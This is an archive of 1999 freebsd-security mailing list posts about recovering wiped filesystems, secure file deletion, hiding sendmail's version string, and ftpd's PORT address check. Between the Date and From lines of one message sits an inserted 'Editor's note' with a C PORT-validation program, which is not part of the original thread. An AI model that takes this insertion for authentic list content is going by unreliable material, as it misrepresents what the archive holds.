> More sophisticated recovery techniques exist, if there's anything critical
> on the system or you really want to find out what's going on. This'll get
> you 90% of what's there with little effort, though.

I'm not sure how my program (ffsrecov in ports) handles deleted files (which it sounds like it is)... but it might help you to recover some data files... just as long as the directory bit hasn't been cleared on the inode... be warned though, right now I'm mmap'ing the file to do the work, which means that you are seriously limited on the file system size, no 4gig fs's for this unless you're on an Alpha.. I haven't tested how large it can go, but I've used it successfully for a 1.8gig fs... and right now ffsrecov doesn't open the file system for writing, so it won't cause any more damage... it's just made for extracting data from the file system... if you have any more ideas for ways of pulling data out of the file system, I'd like to know...

> Lo and behold, Andrew G. Russell once said:
> >
> > Last night, a system that has been running FreeBSD 2.1.5 for a number of
> > years with the last upgrade being sendmail 8.8.4 being added.
> >
> > Three filesystems were cleared out, I don't know if newfs or rm -rf * were
> > used on them.
> >
> > the filesystems were /x(local/src/obj...) /var /tmp
> > that of course covers up the track quite nicely.
> >
> > the mod times on /tmp is May 18 21:09, on /var May 18 21:09 and on /x
> > May 18 21:33
> >
> > this being an old system, when I could not get at the /x filesystem, I rebooted.
> >
> > This system will be upgraded to 2.2.8, but I sure would like some clue as
> > to how it happened.

--
John-Mark Gurney    Voice: +1 541 684 8449
Cu Networking       P.O. Box 5693, 97405

"The soul contains in itself the event that shall presently befall it.
The event is only the actualizing of its thought." -- Ralph Waldo Emerson

From owner-freebsd-security Thu May 20 2:35:58 1999
Delivered-To: freebsd-security@freebsd.org Received: from 001101.zer0.org (001101.zer0.org [206.24.105.163]) by hub.freebsd.org (Postfix) with ESMTP id 6BF7014D82 for ; Thu, 20 May 1999 02:35:56 -0700 (PDT) (envelope-from gsutter@001101.zer0.org) Received: (from gsutter@localhost) by 001101.zer0.org (8.9.2/8.9.2) id CAA46763; Thu, 20 May 1999 02:34:16 -0700 (PDT) (envelope-from gsutter) Date: Thu, 20 May 1999 02:34:16 -0700
From: Gregory Sutter To: Darren Reed Cc: Wes Peters , imp@harmony.village.org, ilmar@ints.ru, posix1e@cyrus.watson.org, freebsd-security@FreeBSD.ORG Subject: Re: secure deletion Message-ID: <19990520023416.A46301@001101.zer0.org> References: <37438E4C.4B95B937@softweyr.com> <199905200642.QAA11368@avalon.reed.wattle.id.au> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.4i In-Reply-To: <199905200642.QAA11368@avalon.reed.wattle.id.au>; from Darren Reed on Thu, May 20, 1999 at 04:42:18PM +1000 Organization: Zer0 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Thu, May 20, 1999 at 04:42:18PM +1000, Darren Reed wrote:
> In some email I received from Wes Peters, sie wrote:
> > Warner Losh wrote:
> > >
> > > Does it do the DoD recommended pattern of deletion? That is overwrite
> >
> > The standard used to be 100 overwrites of 0xe5 then 0x5e, but they
> > changed the standard just as I was leaving the defense industry in
> > 1991. Does Posix or SUS have anything to say about this?
>
> I'd worry about this sort of thing when and if FreeBSD is ever used for
> storing of (officially) classified/confidential material and even then,
> the solution is likely to be to take a hammer or drill to the disks.

If someone is going to be coding this, it would be better to code it correctly the first time than have to add it later. It seems easy enough to add--after the first bit compare, should that be enabled, have a second for 'quick' or 'secure' zeroing.

> Let's try being a little realistic, eh?

Thorough != unrealistic.

Greg
--
Gregory S. Sutter                      Failing sardine factory cans employees!
mailto:gsutter@pobox.com
http://www.pobox.com/~gsutter/
PGP DSS public key 0x40AE3052

From owner-freebsd-security Thu May 20 3:13:52 1999
Delivered-To: freebsd-security@freebsd.org Received: from firewall.reed.wattle.id.au (darren2.lnk.telstra.net [139.130.53.33]) by hub.freebsd.org (Postfix) with ESMTP id 5ADFA14F52 for ; Thu, 20 May 1999 03:13:46 -0700 (PDT) (envelope-from darrenr@reed.wattle.id.au) Received: (from root@localhost) by firewall.reed.wattle.id.au (8.9.1/8.8.7) id KAA20818; Thu, 20 May 1999 10:13:45 GMT Received: from avalon.reed.wattle.id.au(192.168.1.1) by firewall.reed.wattle.id.au via smap (V1.3) id sma020816; Thu May 20 10:13:33 1999 Received: from percival.reed.wattle.id.au. (percival.reed.wattle.id.au [192.168.1.5]) by avalon.reed.wattle.id.au (8.9.0.Beta3/8.9.0.Beta3) with SMTP id UAA12994; Thu, 20 May 1999 20:13:31 +1000 (EST)
From: Darren Reed Message-Id: <199905201013.UAA12994@avalon.reed.wattle.id.au> Subject: Re: secure deletion In-Reply-To: <19990520023416.A46301@001101.zer0.org> from Gregory Sutter at "May 20, 99 02:34:16 am" To: gsutter@pobox.com (Gregory Sutter) Date: Thu, 20 May 1999 20:13:31 +1000 (EST) Cc: darrenr@reed.wattle.id.au, wes@softweyr.com, imp@harmony.village.org, ilmar@ints.ru, posix1e@cyrus.watson.org, freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL37 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

In some email I received from Gregory Sutter, sie wrote:
> On Thu, May 20, 1999 at 04:42:18PM +1000, Darren Reed wrote:
> > In some email I received from Wes Peters, sie wrote:
> > > Warner Losh wrote:
> > > >
> > > > Does it do the DoD recommended pattern of deletion? That is overwrite
> > >
> > > The standard used to be 100 overwrites of 0xe5 then 0x5e, but they
> > > changed the standard just as I was leaving the defense industry in
> > > 1991. Does Posix or SUS have anything to say about this?
> >
> > I'd worry about this sort of thing when and if FreeBSD is ever used for
> > storing of (officially) classified/confidential material and even then,
> > the solution is likely to be to take a hammer or drill to the disks.
>
> If someone is going to be coding this, it would be better to code it
> correctly the first time than have to add it later. It seems easy
> enough to add--after the first bit compare, should that be enabled,
> have a second for 'quick' or 'secure' zeroing.

So properly in this case means using memset rather than bzero and a variable number of passes, correct (with perhaps a programmable pattern)? Being able to verify that the file's contents get nuked to the value the pass is meant to have set it to might be worthwhile.
After the first pass, I'm not sure that there is any meaningful addition to the security of the erased data. Access to sophisticated machinery is required to circumvent it, but if that is what you're trying to protect against then why fool yourself by deploying a level of security that is known to be less than that of Government bodies who physically destroy disks.

I don't think you understand the problem properly if you think it can be coded "correctly" - what you're proposing just isn't possible via software, where one overwrite is pretty much as good as multiple.

Darren

From owner-freebsd-security Thu May 20 6:10: 1 1999
Delivered-To: freebsd-security@freebsd.org Received: from sentry.granch.ru (sentry.granch.ru [212.20.5.135]) by hub.freebsd.org (Postfix) with ESMTP id 15B8114C41 for ; Thu, 20 May 1999 06:09:36 -0700 (PDT) (envelope-from shelton@sentry.granch.ru) Received: from sentry.granch.ru (1001@localhost.granch.ru [127.0.0.1]) by sentry.granch.ru (8.9.3/8.9.3) with ESMTP id UAA06541 for ; Thu, 20 May 1999 20:10:28 +0700 (NSS) Message-ID: <374409C2.D1E63188@sentry.granch.ru> Date: Thu, 20 May 1999 20:10:26 +0700
From: "Rashid N. Achilov" Organization: Granch Ltd. X-Mailer: Mozilla 4.6 [en] (X11; I; FreeBSD 2.2.8-RELEASE i386) X-Accept-Language: ru, en MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: Sendmail HELP confuses me Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

How can I delete the version number from the message displayed by the HELP command in a telnet session to the sendmail port? The greeting can be customized in sendmail.cf, but I cannot find HELP there, nor in sendmail.hf.

--
With Best Regards.
Rashid N. Achilov (RNA1-RIPE), Granch Ltd. lead engineer
e-mail: achilov@granch.ru, tel (383-2) 24-2363

From owner-freebsd-security Thu May 20 6:20:57 1999
Delivered-To: freebsd-security@freebsd.org Received: from mail.tepucom.nl (mail.tepucom.nl [195.81.12.5]) by hub.freebsd.org (Postfix) with ESMTP id DAC5F14CFE for ; Thu, 20 May 1999 06:20:50 -0700 (PDT) (envelope-from theo@tepucom.nl) Received: from kantoor-1.tepucom.nl (localhost [127.0.0.1]) by mail.tepucom.nl (8.8.5/SCO5) with SMTP id PAA13181; Thu, 20 May 1999 15:19:50 +0200 (CETDST) Received: by kantoor-1.tepucom.nl with Microsoft Mail id <01BEA2C7.E8FDEEA0@kantoor-1.tepucom.nl>; Thu, 20 May 1999 13:51:50 +-200 Message-ID: <01BEA2C7.E8FDEEA0@kantoor-1.tepucom.nl>
From: "Theo Purmer (Tepucom)" To: "'Rashid N. Achilov'" Cc: "'freebsd-security@FreeBSD.ORG'" Subject: Re: Sendmail HELP confuses me Date: Thu, 20 May 1999 13:51:49 +-200 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

The version number is represented by $v in sendmail.cf.
The initial login message is preceded with De in sendmail.cf.
The help messages are normally in the sendmail.hf file.

cheers
theo purmer
tepucom
the netherlands

From owner-freebsd-security Thu May 20 7:58: 2 1999
Delivered-To: freebsd-security@freebsd.org Received: from server.mindstep.com (cr480472-a.slnt1.on.wave.home.com [24.112.33.138]) by hub.freebsd.org (Postfix) with SMTP id B5E31150AF for ; Thu, 20 May 1999 07:57:55 -0700 (PDT) (envelope-from patrick@mindstep.com) Received: (qmail 12090 invoked from network); 20 May 1999 14:57:55 -0000 Received: from pm6100.local.mindstep.com (HELO ?192.168.55.3?) (192.168.55.3) by local.mindstep.com with SMTP; 20 May 1999 14:57:55 -0000 X-Mailer: Microsoft Outlook Express Macintosh Edition - 4.5 (0410) Date: Thu, 20 May 1999 10:57:52 -0400 Subject: Re: secure deletion
From: "Patrick Bihan-Faou" To: Darren Reed , Gregory Sutter Cc: darrenr@reed.wattle.id.au, wes@softweyr.com, imp@harmony.village.org, ilmar@ints.ru, posix1e@cyrus.watson.org, freebsd-security@FreeBSD.ORG Mime-version: 1.0 X-Priority: 3 Content-type: text/plain; charset="US-ASCII" Content-transfer-encoding: 7bit Message-Id: <19990520145800.B5E31150AF@hub.freebsd.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

In some email I received, Darren Reed wrote:
> I don't think you understand the problem properly if you think it can be
> coded "correctly" - what you're proposing just isn't possible via software
> where one overwrite is pretty much as good as multiple.

I agree with that last statement. An implementation on FreeBSD probably does not need to write multiple times to the disk. The added security in that case will not matter. What I think is the issue is how much security people are seeking. You can see several levels:

- none: files are deleted the way they are now, and it is fine. The mechanism provided by FreeBSD when reallocating the disk blocks is good enough to ensure the level of confidentiality we are looking after.

- basic: what the original poster was suggesting: writing garbage data (be it zero or some pattern) over the deleted chunks. The clear advantage of that is that if you try to recover the freed blocks on a system comparable to the original system, you will probably not get anything useful out of the disk.

- thorough: what government agencies do: physically destroy the disk. But this is not really practical when you just intend to erase a single file...

In defense of the "basic" mechanism, I can see people getting worried that by just running some program on a disk people can recover data that they would wish gone for good.
I am not talking about an organization that could use all the funky hardware that would be required to find the remanence of the magnetic trace left by the data that was on the disk 20 writes ago, but just somebody pulling the disk into another system and running recovery programs.

I don't think the original poster was considering applications with very tight security requirements (like the government may have in some cases). But more protection against "casual" hackers (if such a thing exists).

Just my 2 cents,

Have a nice day.

Patrick.

--
Et les Shadoks pompaient...

From owner-freebsd-security Thu May 20 8:53:40 1999
Delivered-To: freebsd-security@freebsd.org Received: from india.wind-river.com (india.wind-river.com [12.10.173.8]) by hub.freebsd.org (Postfix) with ESMTP id A77FA14D04 for ; Thu, 20 May 1999 08:53:38 -0700 (PDT) (envelope-from jmaslak@wind-river.com) Received: from junk (jerico-sv-12.wind-river.com [12.10.173.1]) by india.wind-river.com (8.9.3/8.9.3) with SMTP id KAA19259 for ; Thu, 20 May 1999 10:02:08 -0600 Message-Id: <3.0.6.32.19990520095507.00840010@india.wind-river.com> X-Sender: jmaslak@india.wind-river.com X-Mailer: QUALCOMM Windows Eudora Light Version 3.0.6 (32) Date: Thu, 20 May 1999 09:55:07 -0600 To: security@freebsd.org
From: Joel Maslak Subject: Secure Deletion Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Let's keep standard BSD semantics here, please!

As for "secure" deletion... Why doesn't someone just write a simple user-space program to do that. True, it wouldn't handle calls to unlink(), but one would think that someone could modify the library really quick (provided no one does a system call directly, but uses the libc interface instead). I think this would be much better for everyone involved.

Some problems with my idea...

Static-linked executables would need to be recompiled
Library would need to be modified on "secure" systems

If all you want is a way to force a file to go away from the command line, just rewrite rm.

Joel Maslak

UPDATE -- Generate Web Traffic
http://www.permission-marketing.com/

From owner-freebsd-security Thu May 20 8:59:40 1999
Delivered-To: freebsd-security@freebsd.org Received: from idea.co.uk (ultra2.idea.co.uk [194.36.20.11]) by hub.freebsd.org (Postfix) with ESMTP id 287E114D04 for ; Thu, 20 May 1999 08:58:15 -0700 (PDT) (envelope-from kiril@idea.co.uk) Received: (from kiril@localhost) by idea.co.uk (8.9.2/8.9.2) id QAA25977; Thu, 20 May 1999 16:42:26 +0100 (BST)
From: Kiril Mitev Message-Id: <199905201542.QAA25977@idea.co.uk> Subject: Re: secure deletion To: patrick@mindstep.com (Patrick Bihan-Faou) Date: Thu, 20 May 1999 16:42:26 +0100 (BST) Cc: darrenr@reed.wattle.id.au, gsutter@pobox.com, wes@softweyr.com, imp@harmony.village.org, ilmar@ints.ru, posix1e@cyrus.watson.org, freebsd-security@FreeBSD.ORG In-Reply-To: <19990520145800.B5E31150AF@hub.freebsd.org> from "Patrick Bihan-Faou" at May 20, 99 10:57:52 am X-Mailer: ELM [version 2.4 PL25] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

>
> In some email I received, Darren Reed wrote:
> > I don't think you understand the problem properly if you think it can be
> > coded "correctly" - what you're proposing just isn't possible via software
> > where one overwrite is pretty much as good as multiple.
>
> I agree with that last statement. An implementation on FreeBSD probably does
> not need to write multiple times to the disk. The added security in that
> case will not matter. What I think is the issue is how much security people
> are seeking. You can see several levels:
>
> - none: files are deleted the way they are now, and it is fine. The
> mechanism provided by FreeBSD when reallocating the disk blocks is good
> enough to ensure the level of confidentiality we are looking after.
>
> - basic: what the original poster was suggesting: writing garbage data (be
> it zero or some pattern) over the deleted chunks. The clear advantage of
> that is that if you try to recover the freed blocks on a system comparable
> to the original system, you will probably not get anything useful out of the
> disk.
>
> - thorough: what government agencies do: physically destroy the disk. But
> this is not really practical when you just intend to erase a single file...
>
> In defense of the "basic" mechanism, I can see people getting worried that
> by just running some program on a disk people can recover data that they
> would wish gone for good. I am not talking about an organization that could
> use all the funky hardware that would be required to find the remanence of
> the magnetic trace left by the data that was on the disk 20 writes ago, but
> just somebody pulling the disk into another system and running recovery
> programs.
>
> I don't think the original poster was considering applications with very
> tight security requirements (like the government may have in some cases).
> But more protection against "casual" hackers (if such a thing exists).

well, not to split hairs, but if you (1) ARE worried about your disk being put into another machine to be read by recovery tools,

-> then, you are probably worried about physical access to hardware

-> then you (theoretically) should be worried about locking up your hardware, rather than wiping your disk :-0

====
(1) you the generic user, not you Patrick

> Just my 2 cents,
>
> Have a nice day.
>
> Patrick.

From owner-freebsd-security Thu May 20 10:49:40 1999
Delivered-To: freebsd-security@freebsd.org Received: from host07.rwsystems.net (kasie.rwsystems.net [209.197.192.103]) by hub.freebsd.org (Postfix) with ESMTP id 8F6BB15238 for ; Thu, 20 May 1999 10:49:35 -0700 (PDT) (envelope-from jwyatt@RWSystems.net) Received: from kasie.rwsystems.net([209.197.192.103]) (1553 bytes) by host07.rwsystems.net via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp (sender: ) id for ; Thu, 20 May 1999 12:31:08 -0500 (CDT) (Smail-3.2.0.104 1998-Nov-20 #1 built 1998-Dec-24) Date: Thu, 20 May 1999 12:31:06 -0500 (CDT)
From: James Wyatt To: "Ilmar S. Habibulin" Cc: posix1e@cyrus.watson.org, freebsd-security@freebsd.org Subject: Re: secure deletion In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Wed, 19 May 1999, Ilmar S. Habibulin wrote:
> Maybe it's a freebsd-fs@ question, but I think that it belongs here too.
> I heard that some linux fs (maybe extfs2?) has some secure deletion flag,
> which, being set on an inode (file or dir), causes the content of this file to be
> wiped before deletion, so even if somebody manages to restore the file, its
> content would be unusable. I think that it is a nice feature, and I would
> like to see it in freebsd. What would you say?

My first thought was, what a great idea for /etc/master.passwd which gets flushed every time a user updates their password. Good idea for any file containing decrypted data.

My second thought was of the impact of support for wiping in the kernel... If I really wanted to slow down a server I didn't like, setting this flag for files in /tmp and CGI-interim results piping and caching sounds like it could quietly drive disk IO up quite a bit.
- Jy@

From owner-freebsd-security Thu May 20 11: 4:51 1999
Delivered-To: freebsd-security@freebsd.org Received: from mongoose.slip.net (mongoose.slip.net [207.171.193.14]) by hub.freebsd.org (Postfix) with ESMTP id A584C15238 for ; Thu, 20 May 1999 11:04:48 -0700 (PDT) (envelope-from admin@addr.net) Received: from [209.152.191.146] (helo=comp3.addr.com) by mongoose.slip.net with esmtp (Exim 2.12 #4) id 10kXBV-000416-00 for freebsd-security@freebsd.org; Thu, 20 May 1999 11:04:45 -0700 Message-Id: <4.2.0.37.19990520104919.02a14ee0@mail.addr.com> X-Sender: addr@mail.addr.com (Unverified) X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.37 (Beta) Date: Thu, 20 May 1999 11:04:24 -0700 To: freebsd-security@freebsd.org
From: "Addr.com Web Hosting" Subject: question about ftpd security feature. Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Hi,

I have a question regarding a security feature which is built in to the "ftpd" on the FreeBSD system. The feature is that the server will not accept any "PORT" command unless the address matches that of the client. The reason this is a problem is because I am partially proxying the connection, and the client address is that of the proxy, but I don't want the proxy to handle data connections, just have them made directly to the client.

In more detail (and I would appreciate any comments/suggestions about this scheme or any alternate scheme you can recommend):

We have users distributed among several machines; however, we would like for the users to be able to access their account via a single FTP server. We are currently using NFS; however, under heavier loads it becomes unmanageable and unstable. Instead, I have developed a very simple proxy, which queries for the user name and then, based on an internal table, makes the connection to the correct server, and simply pipes any data from the server to the client, and vice versa. This is where I hit the problem that the server will not establish a data connection to any machine other than the proxy. Of course I can proxy the data connection as well, but if it doesn't cause any security issues, I would much rather just comment that line out of the ftpd server.
Thanks in advance,

Anthony

From owner-freebsd-security Thu May 20 12:41: 9 1999
Delivered-To: freebsd-security@freebsd.org Received: from ints.ru (ints.ru [194.67.173.1]) by hub.freebsd.org (Postfix) with ESMTP id C5D871567A for ; Thu, 20 May 1999 12:40:50 -0700 (PDT) (envelope-from ilmar@ws-ilmar.ints.ru) Received: from ws-ilmar.ints.ru (ws-ilmar.ints.ru [194.67.173.16]) by ints.ru (8.9.2/8.9.2) with ESMTP id XAA04540; Thu, 20 May 1999 23:40:48 +0400 (MSD) Received: from localhost (localhost [127.0.0.1]) by ws-ilmar.ints.ru (8.9.2/8.9.1) with ESMTP id XAA02549; Thu, 20 May 1999 23:40:42 +0400 (MSD) Date: Thu, 20 May 1999 23:40:42 +0400 (MSD)
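Editor's note on Anthony's question: the address comparison he runs into is the server refusing to open a data connection to any host other than the one holding the control connection; without it a server could be told to connect to arbitrary third hosts on a client's behalf, which is why ftpd implements it and why proxying the data connection keeps the protection intact. The following is an added example, not ftpd's own code, showing the shape of that check as a small parser plus policy function; the 192.0.2.x addresses and the 1024 privileged-port limit are constructed sample values, and the rejection of privileged ports is the editor's addition on top of the address comparison the post describes.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdint.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define PRIVILEGED_PORT_LIMIT 1024   /* ports below this are never dialled */

struct port_arg {
    uint32_t addr;   /* IPv4 address, host byte order */
    uint16_t port;
};

/* Parse the "h1,h2,h3,h4,p1,p2" argument of an FTP PORT command.
 * Returns 0 on success, -1 if the argument is malformed. */
int parse_port_arg(const char *arg, struct port_arg *out)
{
    unsigned v[6];
    char trailing;

    /* exactly six comma-separated numbers and nothing after them */
    if (sscanf(arg, "%u,%u,%u,%u,%u,%u%c",
               &v[0], &v[1], &v[2], &v[3], &v[4], &v[5], &trailing) != 6)
        return -1;
    for (int i = 0; i < 6; i++)
        if (v[i] > 255)
            return -1;
    out->addr = ((uint32_t)v[0] << 24) | (v[1] << 16) | (v[2] << 8) | v[3];
    out->port = (uint16_t)((v[4] << 8) | v[5]);
    return 0;
}

/* Convert a dotted quad to a host-order uint32_t; returns 0 if it does not parse. */
uint32_t dotted_to_u32(const char *s)
{
    struct in_addr a;

    if (inet_pton(AF_INET, s, &a) != 1)
        return 0;
    return ntohl(a.s_addr);
}

/* The policy: honour a PORT only if it names the control connection's own
 * peer address (client_addr, host byte order) and a non-privileged port.
 * Returns 1 to accept, 0 to refuse. */
int port_allowed(const char *arg, uint32_t client_addr)
{
    struct port_arg p;

    if (parse_port_arg(arg, &p) != 0)
        return 0;
    if (p.addr != client_addr)             /* the comparison the proxy setup trips over */
        return 0;
    if (p.port < PRIVILEGED_PORT_LIMIT)    /* never dial a privileged port on the client */
        return 0;
    return 1;
}

int main(void)
{
    /* constructed sample: control connection peer is 192.0.2.10 */
    uint32_t peer = dotted_to_u32("192.0.2.10");
    const char *samples[] = {
        "192,0,2,10,4,1",    /* same host, port 1025: accept */
        "192,0,2,99,4,1",    /* different host, as a proxy would send: refuse */
        "192,0,2,10,0,25",   /* same host but port 25: refuse */
        "192,0,2,10,4",      /* malformed: refuse */
    };

    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("PORT %-18s -> %s\n", samples[i],
               port_allowed(samples[i], peer) ? "accept" : "refuse");
    return 0;
}
```

The second sample is exactly Anthony's situation: the PORT names the real client while the control connection comes from the proxy, so the comparison fails. Proxying the data connection too (so the PORT the server sees names the proxy) keeps the check in place rather than removing it.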
From: "Ilmar S. Habibulin" To: James Wyatt Cc: posix1e@cyrus.watson.org, freebsd-security@freebsd.org Subject: Re: secure deletion In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Thu, 20 May 1999, James Wyatt wrote:
> My first thought was, what a great idea for /etc/master.passwd which gets
> flushed every time a user updates their password. Good idea for any file
> containing decrypted data.
>
> My second thought of the impact of support for wiping in the kernel... If
> I really wanted to slow down a server I didn't like, setting this flag for
> files in /tmp and CGI-interim results piping and caching sounds like it
> could quietly drive disk IO up quite a bit. - Jy@

My thoughts are about an option in the kernel config file (WIPEINFO?), which will enable wiping support. To wipe the file before deletion you should set some wipe flag on this file. And I suppose that flag could be set only at the apps' wheel. ;-) I don't see any inheritance mechanism for this flag.

From owner-freebsd-security Thu May 20 12:45: 6 1999
Delivered-To: freebsd-security@freebsd.org Received: from tsunami.x5ca.net (tsunami.x5ca.net [206.191.74.2]) by hub.freebsd.org (Postfix) with SMTP id 8499E156B6 for ; Thu, 20 May 1999 12:44:58 -0700 (PDT) (envelope-from alanp@unixpower.org) Received: from unixpower.org (s1m09-dyn.x5ca.net [206.191.74.217]) by tsunami.x5ca.net (950413.SGI.8.6.12/950213.SGI.AUTOCF) via ESMTP id PAA06863 for ; Thu, 20 May 1999 15:46:19 -0400 Message-ID: <3744663D.77280116@unixpower.org> Date: Thu, 20 May 1999 15:45:01 -0400
From: Alan X-Mailer: Mozilla 4.07 [en] (X11; I; FreeBSD 3.2-STABLE i386) MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: Re: attack of failure Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Wed, May 19, 1999 at 11:03:26PM -0500, Andrew G. Russell wrote:
> Last night, a system that has been running FreeBSD 2.1.5 for a number of
> years with the last upgrade being sendmail 8.8.4 being added.
>

sendmail 8.8.4 can give crackers root access, plus you are running a *real* old version of FreeBSD that most likely has a bunch of exploitable things.

> This system will be upgraded to 2.2.8, but I sure would like some clue as
> to how it happened.
>
> Thanks in advance for any help/thoughts.
>
> A.G. Russell

--
| Alan L. * Webmaster of www.UnixPower.org                        |
| Windsor Unix Users Group Founder: http://unix.windsor.on.ca/    |
| Personal Page: http://www.unixpower.org/alanp/                  |

From owner-freebsd-security Thu May 20 12:52: 2 1999
Delivered-To: freebsd-security@freebsd.org Received: from vespucci.advicom.net (vespucci.advicom.net [199.170.120.42]) by hub.freebsd.org (Postfix) with ESMTP id DB11D14F0D for ; Thu, 20 May 1999 12:51:52 -0700 (PDT) (envelope-from avalon@vespucci.advicom.net) Received: from localhost (avalon@localhost) by vespucci.advicom.net (8.8.8/8.8.5) with ESMTP id OAA03968; Thu, 20 May 1999 14:51:40 -0500 (CDT) X-Envelope-Recipient: freebsd-security@FreeBSD.ORG Date: Thu, 20 May 1999 14:51:39 -0500 (CDT)
From: Avalon Books To: Dan Langille Cc: Darren Reed , freebsd-security@FreeBSD.ORG Subject: Re: secure deletion In-Reply-To: <19990520065202.IDMD7869945.mta1-rme@wocker> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

> I know of at least one government department which drills through the
> platters when disposing of a disk drive.

We used to be required to "de-commission" hard drives by disassembling them, degaussing the platters and then forcibly removing the media with a belt grinder. Both the platters (or what was left of them) and the (now powdered) media were placed into secure storage (policy said for 10 years minimum). It seems a bit extreme, but I will admit it *is* a secure erase method.

That's military thinking for you...

--R. Pelletier
Sys Admin, House Galiagante
We are a Micro$oft-free site

From owner-freebsd-security Thu May 20 13: 5:33 1999
Delivered-To: freebsd-security@freebsd.org Received: from vespucci.advicom.net (vespucci.advicom.net [199.170.120.42]) by hub.freebsd.org (Postfix) with ESMTP id 886A814F0D for ; Thu, 20 May 1999 13:05:29 -0700 (PDT) (envelope-from avalon@vespucci.advicom.net) Received: from localhost (avalon@localhost) by vespucci.advicom.net (8.8.8/8.8.5) with ESMTP id PAA06556; Thu, 20 May 1999 15:05:18 -0500 (CDT) X-Envelope-Recipient: security@FreeBSD.ORG Date: Thu, 20 May 1999 15:05:18 -0500 (CDT)
From: Avalon Books To: Joel Maslak Cc: security@FreeBSD.ORG Subject: Re: Secure Deletion In-Reply-To: <3.0.6.32.19990520095507.00840010@india.wind-river.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

> As for "secure" deletion... Why doesn't someone just write a simple
> user-space program to do that. True, it wouldn't handle calls to unlink(),
> but one would think that someone could modify the library really quick
> (provided no one does a system call directly, but uses the libc interface
> instead). I think this would be much better for everyone involved.

Actually, I've done this already. At the moment, it's a simple stand-alone program (I originally wrote it during my DOS days, years ago), but I've been toying with the idea of adding the method in as an option for 'rm'. No need to tie up the kernel with this sort of thing.

It uses a combination of randomly-generated and pattern-specific overwrites of a file (or group of files) in-place, in order to make recovery extremely difficult--even with advanced equipment (like echo-cancellation analysis systems). A standard file-deletion is issued after it's done mangling the file(s) in question. It works ok, I guess, as betas go.

Of course, this does nothing to compensate for all the 'weirdnesses' that hard drive manufacturers implement for the sake of performance. Just the thought of trying to write all that hardware-specific code gives me heartburn. And if somebody gets physical access to a drive before anything gets erased... well... too bad...

Anyway, I have the source code if anybody wants to take a peek at it. It's my personal opinion, however, that the whole idea of performing a true security erase on magnetic media is highly problematic, at best. Recovery techniques are extremely sophisticated these days, and just overwriting a file once or twice with random junk doesn't get the job done anymore...

--R.
Pelletier Sys Admin, House Galiagante We are a Micro$oft-free site To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 20 13:46:27 1999 Delivered-To: freebsd-security@freebsd.org Received: from mx01.iafrica.com.na (mx01.iafrica.com.na [196.31.227.173]) by hub.freebsd.org (Postfix) with ESMTP id 34F9915090 for ; Thu, 20 May 1999 13:46:20 -0700 (PDT) (envelope-from tim@iafrica.com.na) Received: from dup102-whk.iafrica.com.na ([196.20.4.205] helo=aptiva) by mx01.iafrica.com.na with smtp (Exim 2.11 #1) id 10kZhT-000GOJ-00; Thu, 20 May 1999 21:45:55 +0100 Message-ID: <374474D4.2263@iafrica.com.na> Date: Thu, 20 May 1999 22:47:16 +0200 
From: Tim Priebe
Reply-To: tim@iafrica.com.na
X-Mailer: Mozilla 3.01 (Win95; I)
MIME-Version: 1.0
To: Joel Maslak
Cc: security@freebsd.org
Subject: Re: Secure Deletion
References: <3.0.6.32.19990520095507.00840010@india.wind-river.com>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Joel Maslak wrote:
>
> Let's keep standard BSD semantics here, please!
>
> As for "secure" deletion... Why doesn't someone just write a simple
> user-space program to do that. True, it wouldn't handle calls to unlink(),
> but one would think that someone could modify the library really quick
> (provided no one does a system call directly, but uses the libc interface
> instead). I think this would be much better for everyone involved.
>
> Some problems with my idea...
>
> Static-linked executables would need to be recompiled
> Library would need to be modified on "secure" systems
>
